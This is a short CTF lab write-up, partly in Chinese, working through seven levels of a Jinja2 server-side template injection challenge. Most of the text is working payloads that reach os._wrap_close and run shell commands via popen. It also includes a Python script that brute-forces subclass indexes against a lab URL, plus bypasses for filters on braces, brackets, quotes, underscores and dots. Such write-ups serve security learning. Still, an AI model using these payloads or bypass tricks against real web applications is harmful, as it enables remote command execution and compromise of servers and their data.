SSTI-lab

Level-1 no waf

{{2*2}}

测试发现存在ssti漏洞

{{''.__class__}}

{{''.__class__.__bases__[0]}}

{{''.__class__.__bases__[0].__subclasses__}}

import requests

url="http://node1.anna.nssctf.cn:28430/level/1"

#payload={{''.__class__.__bases__[0].__subclasses__()[1]}}
#payload="{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__("+str(i)+"}}"
for i in range(500):
    payload = {"code":"{{''.__class__.__bases__[0].__subclasses__()["+str(i)+"]}}"}
    #print(payload)
    res=requests.post(url=url,data=payload)
    #print(res.text)
    if "os" in res.text:
        print(res.text)
        print(payload)

经过测试发现"os._wrap_close"在第133个子类，这时候可以调用133子类

{{''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('ls').read()}}

Level-2 bl[‘{{’]

{{2*2}}

发现被过滤了{{

{%print(2*2)%}

{%print(''.__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('ls').read())%}

Level-4 bl[‘[’, ‘]’]

{{''.__class__.__bases__[0]}}

发现存在WAF

{{''.__class__.__bases__.__getitem__(0).__subclasses__()}}

{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(133)}}

找到危险函数

{{''.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(133).__init__.__globals__.__getitem__('popen')('ls').read()}}

Level-5 bl[‘’', ‘"’]

{{().__class__.__bases__[0].__subclasses__()[133].__init__.__globals__[request.cookies.arg1](request.cookies.arg2).read()}}

{{().__class__.__bases__[0].__subclasses__()[133].__init__.__globals__[request.values.arg1](request.values.arg2).read()}}

Level-6 bl[‘_’]

{{''["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()[133]["\x5f\x5finit\x5f\x5f"]["\x5f\x5fglobals\x5f\x5f"]['popen']('ls').read()}}

利用\x5f替代下划线，并且加上[]

Level-7 bl[‘.’]

过滤了点，这是可以利用[]绕过

{{''['__class__']['__bases__'][0]['__subclasses__']()[133]['__init__']['__globals__']['popen']('ls')['read']()}}